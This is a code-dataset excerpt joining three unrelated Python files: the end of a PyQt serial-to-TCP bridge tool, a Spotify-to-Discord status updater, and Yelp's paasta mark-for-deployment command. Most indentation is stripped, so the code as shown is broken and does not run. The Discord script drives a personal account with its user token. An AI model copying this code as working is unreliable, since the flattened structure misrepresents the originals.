self.ui.oActInfo.triggered.connect(self.about)
self.ui.oActExit.triggered.connect(self.close)
self.ui.oEntryIp0.setText('192')
self.ui.oEntryIp1.setText('168')
self.ui.oEntryIp2.setText('1')
self.ui.oEntryIp3.setText('111')
self.ui.oEntryPort.setText('7000')
self.updateComList()
self.ui.oButStartStop.clicked.connect(self.startStopBind)
def startStopBind(self):
l_label = ['Stop', 'Start']
self.bStartStopFlag = not self.bStartStopFlag
print('The start flag: {}'.format(self.bStartStopFlag))
self.ui.oButStartStop.setText(l_label[int(not self.bStartStopFlag)])
if not self.bStartStopFlag:
self.ui.oListBoxCom.setDisabled(False)
self.ui.oEntryIp0.setDisabled(False)
self.ui.oEntryIp1.setDisabled(False)
self.ui.oEntryIp2.setDisabled(False)
self.ui.oEntryIp3.setDisabled(False)
self.ui.oEntryPort.setDisabled(False)
self.ui.oLbStatus.setPixmap(QtGui.QPixmap(":/red.png"))
self.closeAll()
else:
self.ui.oListBoxCom.setDisabled(True)
self.ui.oEntryIp0.setDisabled(True)
self.ui.oEntryIp1.setDisabled(True)
self.ui.oEntryIp2.setDisabled(True)
self.ui.oEntryIp3.setDisabled(True)
self.ui.oEntryPort.setDisabled(True)
self.ui.oLbStatus.setPixmap(QtGui.QPixmap(":/green.png"))
self.startTcpIpCom()
@staticmethod
def enqueue_output(out, queue):
for line in iter(out.readline, b''):
queue.put(line)
out.close()
def startTcpIpCom(self):
s_my_ip = '{}.{}.{}.{}'.format(
self.ui.oEntryIp0.text(),
self.ui.oEntryIp1.text(),
self.ui.oEntryIp2.text(),
self.ui.oEntryIp3.text()
)
print('Site address: {};{}'.format(s_my_ip, self.ui.oEntryPort.text()))
print('Com Select: {}'.format(self.ui.oListBoxCom.currentText()))
print('Port Select: {}'.format(self.ui.oEntryPort.text()))
self.oProcess = Popen(['com2tcp-rfc2217.bat',
'\\\\.\\{}'.format(self.ui.oListBoxCom.currentText()),
s_my_ip,
str(self.ui.oEntryPort.text())], stdout=PIPE, stdin=PIPE)
self.oQueue = Queue()
self.oThread = Thread(target=self.enqueue_output, args=(self.oProcess.stdout, self.oQueue))
self.oThread.daemon = True
self.oThread.start()
# read line without blocking
while True:
try:
# line = q.get_nowait()
                    # stdout from Popen is bytes; decode before matching and printing
                    line = self.oQueue.get(timeout=.2).decode(errors='ignore')
                    o_check_normal = re.search('Started TCP', line)
                    print(line.rstrip('\n'))
if o_check_normal:
self.bNormalConnect = True
except Empty:
break
if not self.bNormalConnect:
self.startStopBind()
def closeAll(self):
self.oProcess.send_signal(signal.CTRL_C_EVENT)
exit()
def updateComList(self):
self.ui.oListBoxCom.clear()
l_ports = serial.tools.list_ports.comports()
connected = [element.device for element in l_ports]
self.ui.oListBoxCom.addItems(connected)
@staticmethod
def about():
o_msg_box = QMessageBox()
o_msg_box.setWindowTitle("TCP/IP Serial Binding Tool")
o_msg_box.setText("<p>Designer: Brfo</p>"
"<p>Contact: brian.fong@qorvo.com</p>"
"<p>Date: 2021</p>")
o_msg_box.exec_()
if __name__ == "__main__":
app = QApplication(sys.argv)
win = Window()
win.show()
sys.exit(app.exec_())
|
signpeaker.py
|
from urllib.parse import urlencode
import threading
import traceback
import responder
import requests
import livejson
import datetime
import base64
import pytz
import time
SETTINGS = livejson.File("settings.json")
if "host" not in SETTINGS:
SETTINGS["host"] = "0.0.0.0"
if "port" not in SETTINGS:
SETTINGS["port"] = 5768
if "ssl" not in SETTINGS:
SETTINGS["ssl"] = False
if "ssl_cert" not in SETTINGS:
SETTINGS["ssl_cert"] = None
if "ssl_key" not in SETTINGS:
SETTINGS["ssl_key"] = None
if "client_id" not in SETTINGS:
SETTINGS["client_id"] = None
if "client_secret" not in SETTINGS:
SETTINGS["client_secret"] = None
if "redirect_uri" not in SETTINGS:
SETTINGS["redirect_uri"] = None
if "discord_token" not in SETTINGS:
SETTINGS["discord_token"] = None
if "status_message" not in SETTINGS:
SETTINGS["status_message"] = "[ARTISTS] - [TRACK_TITLE]"
if "max_artists" not in SETTINGS:
SETTINGS["max_artists"] = 0
if "emoji_id" not in SETTINGS:
SETTINGS["emoji_id"] = None
if "emoji_name" not in SETTINGS:
SETTINGS["emoji_name"] = "Spotify"
if "fetch_delay" not in SETTINGS:
SETTINGS["fetch_delay"] = 5
if "clear_status_after" not in SETTINGS:
SETTINGS["clear_status_after"] = 0
if "timezone" not in SETTINGS:
SETTINGS["timezone"] = "UTC"
if "access_token" not in SETTINGS:
SETTINGS["access_token"] = None
if "refresh_token" not in SETTINGS:
SETTINGS["refresh_token"] = None
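# The status_message template supports the placeholders [MAIN_ARTIST], [ARTISTS]
# and [TRACK_TITLE]; they are substituted in statusUpdater() below. For example,
# "[ARTISTS] - [TRACK_TITLE]" might render as "Artist A, Artist B - Song Title"
# (hypothetical values shown for illustration).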
api = responder.API()
allow_spotify_login = False
def _log_message(message):
print("[{0}]{1}".format(str(datetime.datetime.now(pytz.timezone(SETTINGS["timezone"]))).split(".", 1)[0], message))
def logInfo(message):
_log_message("[INFO] " + message)
def logWarning(message):
_log_message("[WARNING] " + message)
def logError(message):
_log_message("[ERROR] " + message)
def requestLogin():
logInfo("Please log in on https://accounts.spotify.com/authorize?" + urlencode({
"response_type": "code",
"client_id": SETTINGS["client_id"],
"scope": "user-read-currently-playing",
"redirect_uri": SETTINGS["redirect_uri"]
}))
def onRateLimited():
logWarning("Spotify API rate limited. You may need to increase fetch_delay")
def updateDiscordSettings(jsonData):
return requests.patch("https://discord.com/api/v8/users/@me/settings", headers={
"Authorization": SETTINGS["discord_token"]
}, json=jsonData)
def getTokens(token, grant_type="authorization_code"):
grant_type = grant_type.lower()
assert grant_type.lower() in ["authorization_code", "refresh_token"], "Invalid grant_type"
data = {
"grant_type": grant_type
}
if grant_type == "authorization_code":
data["code"] = token
data["redirect_uri"] = SETTINGS["redirect_uri"]
else:
data["refresh_token"] = token
return requests.post("https://accounts.spotify.com/api/token", headers={
"Authorization": "Basic " + base64.b64encode("{0}:{1}".format(SETTINGS["client_id"], SETTINGS["client_secret"]).encode()).decode()
}, data=data)
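# Hypothetical usage sketch for getTokens() (illustration only): exchange the
# "code" query parameter from the Spotify redirect for tokens, assuming client_id,
# client_secret and redirect_uri are configured.
#   resp = getTokens("<authorization code>")
#   if resp.status_code == 200:
#       tokens = resp.json()  # keys used below: access_token, refresh_token, expires_in, scope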
@api.route("/")
def spotifyUserLogin(req, rresp):
global SETTINGS
global allow_spotify_login
rresp.status_code = 200
rresp.text = ""
if allow_spotify_login:
if "code" in req.params:
rresp.status_code = 500
rresp.text = "Internal server error, check console log"
if SETTINGS["client_id"]:
if SETTINGS["client_secret"]:
if SETTINGS["redirect_uri"]:
try:
jsonResp = getTokens(req.params["code"]).json()
if "error" not in jsonResp:
if "user-read-currently-playing" in jsonResp["scope"]:
allow_spotify_login = False
SETTINGS["access_token"] = jsonResp["access_token"]
SETTINGS["refresh_token"] = jsonResp["refresh_token"]
jsonResp = requests.get("https://api.spotify.com/v1/me", headers={
"Authorization": "Bearer " + SETTINGS["access_token"]
}).json()
if "error" not in jsonResp:
logInfo("Spotify logged in as " + jsonResp["display_name"])
rresp.status_code = 200
rresp.text = "Log in success!"
else:
logError(jsonResp["error"]["message"])
else:
rresp.text = "Permission error, user-read-currently-playing is not in scope"
else:
logError(jsonResp["error_description"])
except Exception as e:
logError(str(e))
else:
logError("redirect_uri is not set")
else:
logError("client_secret is not set")
else:
logError("client_id is not set")
elif "error" in req.params:
rresp.status_code = 401
rresp.text = "Failed to authenticate"
else:
rresp.status_code = 400
rresp.text = "Invalid request"
else:
rresp.status_code = 403
rresp.text = "Spotify login is currently disabled"
def statusUpdater():
retry_delay = 5
crash_retry_delay = 3
while True:
try:
if SETTINGS["discord_token"]:
resp = requests.get("https://discord.com/api/v8/users/@me", headers={
"Authorization": SETTINGS["discord_token"]
})
if resp.status_code == 200:
discordUsername = resp.json()["username"]
logInfo("Discord logged in as " + discordUsername)
last_status_message = ""
while True:
try:
if SETTINGS["access_token"]:
spotifyResp = requests.get("https://api.spotify.com/v1/me/player/currently-playing", headers={
"Authorization": "Bearer " + SETTINGS["access_token"]
})
if spotifyResp.status_code in [200, 204]:
if spotifyResp.status_code == 200:
spotifyJsonResp = spotifyResp.json()
if spotifyJsonResp["item"] and spotifyJsonResp["is_playing"]:
artist_list = [artist["name"] for artist in spotifyJsonResp["item"]["artists"]]
track_title = spotifyJsonResp["item"]["name"]
main_artist = artist_list[0]
artists = ", ".join(artist_list[:SETTINGS["max_artists"] if SETTINGS["max_artists"] > 0 else None])
status_message = SETTINGS["status_message"].replace("[MAIN_ARTIST]", main_artist).replace("[ARTISTS]", artists).replace("[TRACK_TITLE]", track_title)
if status_message != last_status_message:
jsonData = {
"custom_status": {
"text": status_message
}
}
if SETTINGS["clear_status_after"] > 0:
jsonData["custom_status"]["expires_at"] = (datetime.datetime.utcnow() + datetime.timedelta(seconds=SETTINGS["clear_status_after"])).isoformat()[:-3] + "Z"
if SETTINGS["emoji_id"]:
jsonData["custom_status"]["emoji_id"] = SETTINGS["emoji_id"]
if SETTINGS["emoji_name"]:
jsonData["custom_status"]["emoji_name"] = SETTINGS["emoji_name"]
logInfo("Updating Discord status to: " + status_message)
discordResp = updateDiscordSettings(jsonData)
if discordResp.status_code == 200:
last_status_message = status_message
else:
break
time.sleep(SETTINGS["fetch_delay"])
continue
else:
if "" != last_status_message:
logInfo("Removing Discord status...")
discordResp = updateDiscordSettings({"custom_status": None})
if discordResp.status_code == 200:
last_status_message = ""
else:
break
time.sleep(SETTINGS["fetch_delay"])
continue
else:
if "" != last_status_message:
logInfo("Removing Discord status...")
discordResp = updateDiscordSettings({"custom_status": None})
if discordResp.status_code == 200:
last_status_message = ""
else:
break
time.sleep(retry_delay)
continue
                                elif spotifyResp.status_code == 429:
                                    onRateLimited()
                                    time.sleep(int(spotifyResp.headers["Retry-After"]))
continue
else:
try:
                                        logError(spotifyResp.json()["error"]["message"])
except:
pass
time.sleep(retry_delay)
continue
else:
time.sleep(retry_delay)
continue
except Exception as e:
logError(str(e))
time.sleep(crash_retry_delay)
continue
else:
logError("Discord token is invalid")
time.sleep(retry_delay)
continue
else:
logError("discord_token is not set")
time.sleep(retry_delay)
continue
except Exception as e:
logError(str(e))
time.sleep(crash_retry_delay)
def statusUpdaterDaemon():
global SETTINGS
global allow_spotify_login
statusUpdaterStarted = False
retry_delay = 5
crash_retry_delay = 3
while True:
try:
if SETTINGS["client_id"]:
if SETTINGS["client_secret"]:
if SETTINGS["redirect_uri"]:
if SETTINGS["refresh_token"]:
logInfo("Refreshing Spotify token...")
resp = getTokens(SETTINGS["refresh_token"], grant_type="refresh_token")
if resp.status_code == 200:
jsonResp = resp.json()
SETTINGS["access_token"] = jsonResp["access_token"]
expires_in = jsonResp["expires_in"]
if not statusUpdaterStarted:
logInfo("Starting status updater...")
statusUpdaterThread = threading.Thread(target=statusUpdater)
statusUpdaterThread.daemon = True
statusUpdaterThread.start()
statusUpdaterStarted = True
time.sleep(expires_in - 60)
continue
elif resp.status_code == 429:
onRateLimited()
time.sleep(int(resp.headers["Retry-After"]))
continue
else:
SETTINGS["refresh_token"] = None
SETTINGS["access_token"] = None
allow_spotify_login = True
else:
allow_spotify_login = True
if allow_spotify_login:
requestLogin()
time.sleep(retry_delay)
continue
else:
logError("redirect_uri is not set")
time.sleep(retry_delay)
continue
else:
logError("client_secret is not set")
time.sleep(retry_delay)
continue
else:
logError("client_id is not set")
time.sleep(retry_delay)
continue
except Exception as e:
logError(str(e))
time.sleep(crash_retry_delay)
statusUpdaterDaemonThread = threading.Thread(target=statusUpdaterDaemon)
statusUpdaterDaemonThread.daemon = True
statusUpdaterDaemonThread.start()
ssl_certfile = None
ssl_keyfile = None
if SETTINGS["ssl"]:
ssl_certfile = SETTINGS["ssl_cert"]
ssl_keyfile = SETTINGS["ssl_key"]
api.run(address=SETTINGS["host"], port=SETTINGS["port"], ssl_certfile=ssl_certfile, ssl_keyfile=ssl_keyfile)
|
mark_for_deployment.py
|
#!/usr/bin/env python
# Copyright 2015-2016 Yelp Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Contains methods used by the paasta client to mark a docker image for
deployment to a cluster.instance.
"""
import datetime
import getpass
import logging
import math
import os
import socket
import sys
import time
import traceback
from collections import defaultdict
from queue import Empty
from queue import Queue
from threading import Event
from threading import Thread
from typing import Collection
from typing import Dict
from typing import Iterator
from typing import Mapping
from typing import Optional
import humanize
import progressbar
from bravado.exception import HTTPError
from requests.exceptions import ConnectionError
from service_configuration_lib import read_deploy
from slackclient import SlackClient
from sticht import state_machine
from sticht.slo import SLOSlackDeploymentProcess
from paasta_tools import remote_git
from paasta_tools.api import client
from paasta_tools.cassandracluster_tools import CassandraClusterDeploymentConfig
from paasta_tools.cli.cmds.push_to_registry import is_docker_image_already_in_registry
from paasta_tools.cli.utils import get_jenkins_build_output_url
from paasta_tools.cli.utils import lazy_choices_completer
from paasta_tools.cli.utils import list_deploy_groups
from paasta_tools.cli.utils import trigger_deploys
from paasta_tools.cli.utils import validate_git_sha
from paasta_tools.cli.utils import validate_given_deploy_groups
from paasta_tools.cli.utils import validate_service_name
from paasta_tools.cli.utils import validate_short_git_sha
from paasta_tools.deployment_utils import get_currently_deployed_sha
from paasta_tools.kubernetes_tools import KubernetesDeploymentConfig
from paasta_tools.marathon_tools import MarathonServiceConfig
from paasta_tools.paasta_service_config_loader import PaastaServiceConfigLoader
from paasta_tools.slack import get_slack_client
from paasta_tools.utils import _log
from paasta_tools.utils import _log_audit
from paasta_tools.utils import DEFAULT_SOA_DIR
from paasta_tools.utils import format_tag
from paasta_tools.utils import get_git_url
from paasta_tools.utils import get_paasta_tag_from_deploy_group
from paasta_tools.utils import get_username
from paasta_tools.utils import ldap_user_search
from paasta_tools.utils import list_services
from paasta_tools.utils import load_system_paasta_config
from paasta_tools.utils import PaastaColors
from paasta_tools.utils import RollbackTypes
from paasta_tools.utils import TimeoutError
DEFAULT_DEPLOYMENT_TIMEOUT = 3600 # seconds
DEFAULT_AUTO_CERTIFY_DELAY = 600 # seconds
DEFAULT_SLACK_CHANNEL = "#deploy"
log = logging.getLogger(__name__)
def add_subparser(subparsers):
list_parser = subparsers.add_parser(
"mark-for-deployment",
help="Mark a docker image for deployment in git",
description=(
"'paasta mark-for-deployment' uses Git as the control-plane, to "
"signal to other PaaSTA components that a particular docker image "
"is ready to be deployed."
),
epilog=(
"Note: Access and credentials to the Git repo of a service are required "
"for this command to work."
),
)
list_parser.add_argument(
"-u",
"--git-url",
help=(
"Git url for service -- where magic mark-for-deployment tags are pushed. "
"Defaults to the normal git URL for the service."
),
default=None,
)
list_parser.add_argument(
"-c",
"-k",
"--commit",
help="Git sha to mark for deployment",
required=True,
type=validate_short_git_sha,
)
list_parser.add_argument(
"-l",
"--deploy-group",
"--clusterinstance",
help="Mark the service ready for deployment in this deploy group (e.g. "
"cluster1.canary, cluster2.main). --clusterinstance is deprecated and "
"should be replaced with --deploy-group",
required=True,
).completer = lazy_choices_completer(list_deploy_groups)
list_parser.add_argument(
"-s",
"--service",
help="Name of the service which you wish to mark for deployment. Leading "
'"services-" will be stripped.',
required=True,
).completer = lazy_choices_completer(list_services)
list_parser.add_argument(
"--verify-image-exists",
help="Check the docker registry and verify the image has been pushed",
dest="verify_image",
action="store_true",
default=False,
)
list_parser.add_argument(
"--wait-for-deployment",
        help="Set to poll paasta and wait for the deployment to finish; "
"the default strategy is to mark for deployment and exit straightaway",
dest="block",
action="store_true",
default=False,
)
list_parser.add_argument(
"-t",
"--timeout",
dest="timeout",
type=int,
default=DEFAULT_DEPLOYMENT_TIMEOUT,
help=(
"Time in seconds to wait for paasta to deploy the service. "
"If the timeout is exceeded we return 1. "
"Default is %(default)s seconds."
),
)
list_parser.add_argument(
"--auto-rollback",
help="Automatically roll back to the previously deployed sha if the deployment "
"times out or is canceled (ctrl-c). Only applicable with --wait-for-deployment. "
"Defaults to false.",
dest="auto_rollback",
action="store_true",
default=False,
)
list_parser.add_argument(
"-d",
"--soa-dir",
dest="soa_dir",
metavar="SOA_DIR",
default=DEFAULT_SOA_DIR,
help="define a different soa config directory",
)
list_parser.add_argument(
"-v",
"--verbose",
action="count",
dest="verbose",
default=0,
help="Print out more output.",
)
list_parser.add_argument(
"--auto-certify-delay",
dest="auto_certify_delay",
type=int,
default=None, # the logic for this is complicated. See MarkForDeploymentProcess.get_auto_certify_delay.
        help="After a deploy finishes, wait this many seconds before automatically certifying. "
f"Default {DEFAULT_AUTO_CERTIFY_DELAY} when --auto-rollback is enabled",
)
list_parser.add_argument(
"--auto-abandon-delay",
dest="auto_abandon_delay",
type=int,
default=600,
help="After a rollback finishes, wait this many seconds before automatically abandoning.",
)
list_parser.add_argument(
"--auto-rollback-delay",
dest="auto_rollback_delay",
type=int,
default=30,
help="After noticing an SLO failure, wait this many seconds before automatically rolling back.",
)
list_parser.add_argument(
"--author",
dest="authors",
default=None,
action="append",
help="Additional author(s) of the deploy, who will be pinged in Slack",
)
list_parser.set_defaults(command=paasta_mark_for_deployment)
def mark_for_deployment(git_url, deploy_group, service, commit):
"""Mark a docker image for deployment"""
tag = get_paasta_tag_from_deploy_group(
identifier=deploy_group, desired_state="deploy"
)
remote_tag = format_tag(tag)
ref_mutator = remote_git.make_force_push_mutate_refs_func(
targets=[remote_tag], sha=commit
)
max_attempts = 3
for attempt in range(1, max_attempts + 1):
try:
remote_git.create_remote_refs(
git_url=git_url, ref_mutator=ref_mutator, force=True
)
if "yelpcorp.com" in git_url:
trigger_deploys(service)
except Exception as e:
logline = f"Failed to mark {commit} for deployment in deploy group {deploy_group}! (attempt \
{attempt}/{max_attempts}, error: {e}) \n Have you pushed your commit?"
_log(service=service, line=logline, component="deploy", level="event")
time.sleep(5 * attempt)
else:
logline = f"Marked {commit} for deployment in deploy group {deploy_group}"
_log(service=service, line=logline, component="deploy", level="event")
audit_action_details = {"deploy_group": deploy_group, "commit": commit}
_log_audit(
action="mark-for-deployment",
action_details=audit_action_details,
service=service,
)
return 0
return 1
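# Note on the retry loop above: the for/try/except/else pattern retries the git
# push up to max_attempts times. The else branch runs only when no exception was
# raised, so a successful push logs, audits and returns 0; exhausting every
# attempt falls through to return 1.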
def deploy_authz_check(deploy_info, service):
deploy_username = get_username()
system_paasta_config = load_system_paasta_config()
allowed_groups = (
deploy_info["allowed_push_groups"]
if deploy_info.get("allowed_push_groups") is not None
else system_paasta_config.get_default_push_groups()
)
if allowed_groups is not None:
search_base = system_paasta_config.get_ldap_search_base()
search_ou = system_paasta_config.get_ldap_search_ou()
host = system_paasta_config.get_ldap_host()
ldap_username = system_paasta_config.get_ldap_reader_username()
ldap_password = system_paasta_config.get_ldap_reader_password()
if not any(
[
deploy_username
in ldap_user_search(
group, search_base, search_ou, host, ldap_username, ldap_password
)
for group in allowed_groups
]
):
logline = f"current user is not authorized to perform this action (should be in one of {allowed_groups})"
_log(service=service, line=logline, component="deploy", level="event")
print(logline, file=sys.stderr)
sys.exit(1)
def report_waiting_aborted(service, deploy_group):
print(
PaastaColors.red(
"Waiting for deployment aborted."
" PaaSTA will continue trying to deploy this code."
)
)
print("If you wish to see the status, run:")
print()
print(f" paasta status -s {service} -l {deploy_group} -v")
print()
def get_authors_to_be_notified(git_url, from_sha, to_sha, authors):
if from_sha is None:
return ""
if authors:
authors_to_notify = authors
elif "git.yelpcorp.com" in git_url:
ret, git_authors = remote_git.get_authors(
git_url=git_url, from_sha=from_sha, to_sha=to_sha
)
if ret == 0:
authors_to_notify = git_authors.split()
else:
return f"(Could not get authors: {git_authors})"
else:
# We have no way of getting authors on the fly if the repository is not on gitolite
return ""
slacky_authors = ", ".join({f"<@{a}>" for a in authors_to_notify})
log.debug(f"Authors: {slacky_authors}")
return f"^ {slacky_authors}"
def deploy_group_is_set_to_notify(deploy_info, deploy_group, notify_type):
for step in deploy_info.get("pipeline", []):
if step.get("step", "") == deploy_group:
# Use the specific notify_type if available else use slack_notify
return step.get(notify_type, step.get("slack_notify", False))
return False
def get_deploy_info(service, soa_dir):
file_path = os.path.join(soa_dir, service, "deploy.yaml")
return read_deploy(file_path)
def print_rollback_cmd(old_git_sha, commit, auto_rollback, service, deploy_group):
if old_git_sha is not None and old_git_sha != commit and not auto_rollback:
print()
print("If you wish to roll back, you can run:")
print()
print(
PaastaColors.bold(
" paasta rollback --service {} --deploy-group {} --commit {} ".format(
service, deploy_group, old_git_sha
)
)
)
def paasta_mark_for_deployment(args):
"""Wrapping mark_for_deployment"""
if args.verbose:
log.setLevel(level=logging.DEBUG)
else:
log.setLevel(level=logging.INFO)
service = args.service
if service and service.startswith("services-"):
service = service.split("services-", 1)[1]
validate_service_name(service, soa_dir=args.soa_dir)
deploy_group = args.deploy_group
in_use_deploy_groups = list_deploy_groups(service=service, soa_dir=args.soa_dir)
_, invalid_deploy_groups = validate_given_deploy_groups(
in_use_deploy_groups, [deploy_group]
)
if len(invalid_deploy_groups) == 1:
print(
PaastaColors.red(
"ERROR: These deploy groups are not currently used anywhere: %s.\n"
% (",").join(invalid_deploy_groups)
)
)
print(
PaastaColors.red(
"This isn't technically wrong because you can mark-for-deployment before deploying there"
)
)
print(
PaastaColors.red(
"but this is probably a typo. Did you mean one of these in-use deploy groups?:"
)
)
print(PaastaColors.red(" %s" % (",").join(in_use_deploy_groups)))
print()
print(PaastaColors.red("Continuing regardless..."))
if args.git_url is None:
args.git_url = get_git_url(service=service, soa_dir=args.soa_dir)
commit = validate_git_sha(sha=args.commit, git_url=args.git_url)
old_git_sha = get_currently_deployed_sha(service=service, deploy_group=deploy_group)
if old_git_sha == commit:
print(
"Warning: The sha asked to be deployed already matches what is set to be deployed:"
)
print(old_git_sha)
print("Continuing anyway.")
if args.verify_image:
if not is_docker_image_already_in_registry(service, args.soa_dir, commit):
raise ValueError(
"Failed to find image in the registry for the following sha %s" % commit
)
deploy_info = get_deploy_info(service=service, soa_dir=args.soa_dir)
deploy_authz_check(deploy_info, service)
deploy_process = MarkForDeploymentProcess(
service=service,
deploy_info=deploy_info,
deploy_group=deploy_group,
commit=commit,
old_git_sha=old_git_sha,
git_url=args.git_url,
auto_rollback=args.auto_rollback,
block=args.block,
soa_dir=args.soa_dir,
timeout=args.timeout,
auto_certify_delay=args.auto_certify_delay,
auto_abandon_delay=args.auto_abandon_delay,
auto_rollback_delay=args.auto_rollback_delay,
authors=args.authors,
)
ret = deploy_process.run()
return ret
class Progress:
def __init__(self, percent=0, waiting_on=None, eta=None):
self.percent = percent
self.waiting_on = waiting_on
def human_readable(self, summary: bool):
if self.percent != 0 and self.percent != 100 and not summary:
s = f"{round(self.percent)}% (Waiting on {self.human_waiting_on()})"
else:
s = f"{round(self.percent)}%"
return s
def human_waiting_on(self):
if self.waiting_on is None:
return "N/A"
things = []
for cluster, queue in self.waiting_on.items():
queue_length = len(queue)
if queue_length == 0:
continue
elif queue_length == 1:
things.append(f"`{cluster}`: `{queue[0].get_instance()}`")
else:
things.append(f"`{cluster}`: {len(queue)} instances")
return ", ".join(things)
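# Illustrative (hypothetical) rendering of Progress.human_waiting_on(): given
# waiting_on = {"clusterA": [<one instance config>], "clusterB": [<three configs>]},
# it would return something like "`clusterA`: `canary`, `clusterB`: 3 instances".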
class MarkForDeploymentProcess(SLOSlackDeploymentProcess):
rollback_states = ["start_rollback", "rolling_back", "rolled_back"]
rollforward_states = ["start_deploy", "deploying", "deployed"]
default_slack_channel = DEFAULT_SLACK_CHANNEL
def __init__(
self,
service,
deploy_info,
deploy_group,
commit,
old_git_sha,
git_url,
auto_rollback,
block,
soa_dir,
timeout,
auto_certify_delay,
auto_abandon_delay,
auto_rollback_delay,
authors=None,
):
self.service = service
self.deploy_info = deploy_info
self.deploy_group = deploy_group
self.commit = commit
self.old_git_sha = old_git_sha
self.git_url = git_url
self.auto_rollback = (
auto_rollback and old_git_sha is not None and old_git_sha != commit
)
self.auto_rollbacks_ever_enabled = self.auto_rollback
self.block = block
self.soa_dir = soa_dir
self.timeout = timeout
self.mark_for_deployment_return_code = -1
self.auto_certify_delay = auto_certify_delay
self.auto_abandon_delay = auto_abandon_delay
self.auto_rollback_delay = auto_rollback_delay
self.authors = authors
# Separate green_light per commit, so that we can tell wait_for_deployment for one commit to shut down
# and quickly launch wait_for_deployment for another commit without causing a race condition.
self.wait_for_deployment_green_lights = defaultdict(Event)
self.human_readable_status = "Waiting on mark-for-deployment to initialize..."
self.progress = Progress()
self.last_action = None
self.slo_watchers = []
self.start_slo_watcher_threads(self.service, self.soa_dir)
# Initialize Slack threads and send the first message
super().__init__()
self.ping_authors()
self.print_who_is_running_this()
def get_progress(self, summary=False) -> str:
return self.progress.human_readable(summary)
def print_who_is_running_this(self):
build_url = get_jenkins_build_output_url()
if build_url is not None:
message = f"(<{build_url}|Jenkins Job>)"
else:
message = f"(Run by <@{getpass.getuser()}> on {socket.getfqdn()})"
self.update_slack_thread(message)
def get_authors(self) -> str:
# In order to avoid notifying people who aren't part of the current
        # service push, we calculate authors based on the commits that differ
        # from the current production SHA, as opposed to the old SHA on this deploy
# group.
#
# This avoids situations such as:
# * Notifying people from a previous push which went through stagef,
# if the new push goes through stageg.
# * Notifying everybody who has committed to a repo in the past year
# when updating a "legacy" deploy group (e.g. for yelp-main).
prod_deploy_group = self.deploy_info.get("production_deploy_group")
from_sha = None
if prod_deploy_group is not None:
from_sha = get_currently_deployed_sha(
service=self.service, deploy_group=prod_deploy_group
)
# If there's no production deploy group, or the production deploy group
# has never been deployed to, just use the old SHA from this deploy group.
if from_sha is None:
from_sha = self.old_git_sha
return get_authors_to_be_notified(
git_url=self.git_url,
from_sha=from_sha,
to_sha=self.commit,
authors=self.authors,
)
def ping_authors(self, message: str = None) -> None:
if message:
self.update_slack_thread(f"{message}\n{self.get_authors()}")
else:
self.update_slack_thread(self.get_authors())
def get_slack_client(self) -> SlackClient:
return get_slack_client().sc
def get_slack_channel(self) -> str:
""" Safely get some slack channel to post to. Defaults to ``DEFAULT_SLACK_CHANNEL``.
Currently only uses the first slack channel available, and doesn't support
multi-channel notifications. """
if self.deploy_info.get("slack_notify", True):
try:
channel = self.deploy_info.get("slack_channels")[0]
# Nightly jenkins builds will often re-deploy master. This causes Slack noise that wasn't present before
# the auto-rollbacks work.
if self.commit == self.old_git_sha:
print(
f"Rollback SHA matches rollforward SHA: {self.commit}, "
f"Sending slack notifications to {DEFAULT_SLACK_CHANNEL} instead of {channel}."
)
return DEFAULT_SLACK_CHANNEL
else:
return channel
except (IndexError, AttributeError, TypeError):
return DEFAULT_SLACK_CHANNEL
else:
return DEFAULT_SLACK_CHANNEL
def get_deployment_name(self) -> str:
return f"Deploy of `{self.commit[:8]}` of `{self.service}` to `{self.deploy_group}`:"
def on_enter_start_deploy(self):
self.update_slack_status(
f"Marking `{self.commit[:8]}` for deployment for {self.deploy_group}..."
)
self.mark_for_deployment_return_code = mark_for_deployment(
git_url=self.git_url,
deploy_group=self.deploy_group,
service=self.service,
commit=self.commit,
)
if self.mark_for_deployment_return_code != 0:
self.trigger("mfd_failed")
else:
self.update_slack_thread(
f"Marked `{self.commit[:8]}` for {self.deploy_group}."
+ (
"\n" + self.get_authors()
if self.deploy_group_is_set_to_notify("notify_after_mark")
else ""
)
)
log.debug("triggering mfd_succeeded")
self.trigger("mfd_succeeded")
def schedule_paasta_status_reminder(self):
timeout_percentage_before_reminding = 75
def waiting_on_to_status(waiting_on):
if waiting_on is None:
return [
f"`paasta status --service {self.service} --{self.deploy_group}` -vv"
]
commands = []
for cluster, queue in waiting_on.items():
queue_length = len(queue)
if queue_length == 0:
continue
else:
instances = [q.get_instance() for q in queue]
commands.append(
f"`paasta status --service {self.service} --cluster {cluster} --instance {','.join(instances)} -vv`"
)
return commands
def times_up():
try:
if self.state == "deploying":
human_max_deploy_time = humanize.naturaldelta(
datetime.timedelta(seconds=self.timeout)
)
status_commands = "\n".join(
waiting_on_to_status(self.progress.waiting_on)
)
self.notify_users(
(
f"It has been {timeout_percentage_before_reminding}% of the maximum deploy time ({human_max_deploy_time}), "
"it probably should have finished by now. Is it stuck?\n\n"
"Try running this command to see the status of the deploy:\n"
f"{status_commands}"
)
)
except Exception as e:
log.error(
f"Non-fatal exception encountered when processing the status reminder: {e}"
)
def schedule_callback():
time_to_notify = self.timeout * (timeout_percentage_before_reminding / 100)
self.paasta_status_reminder_handle = self.event_loop.call_later(
time_to_notify, times_up
)
try:
self.event_loop.call_soon_threadsafe(schedule_callback)
except Exception as e:
log.error(
f"Non-fatal error encountered scheduling the status reminder callback: {e}"
)
def cancel_paasta_status_reminder(self):
try:
handle = self.get_paasta_status_reminder_handle()
if handle is not None:
handle.cancel()
self.paasta_status_reminder_handle = None
except Exception as e:
log.error(
f"Non-fatal error encountered when canceling the paasta status reminder: {e}"
)
def get_paasta_status_reminder_handle(self):
try:
return self.paasta_status_reminder_handle
except AttributeError:
return None
def states(self) -> Collection[str]:
return [
"_begin",
"start_deploy",
"deploying",
"deployed",
"mfd_failed",
"deploy_errored",
"deploy_cancelled",
"start_rollback",
"rolling_back",
"rolled_back",
"abandon",
"complete",
]
def start_state(self) -> str:
return "_begin"
def start_transition(self) -> str:
return "start_deploy"
def valid_transitions(self) -> Iterator[state_machine.TransitionDefinition]:
rollback_is_possible = (
self.old_git_sha is not None and self.old_git_sha != self.commit
)
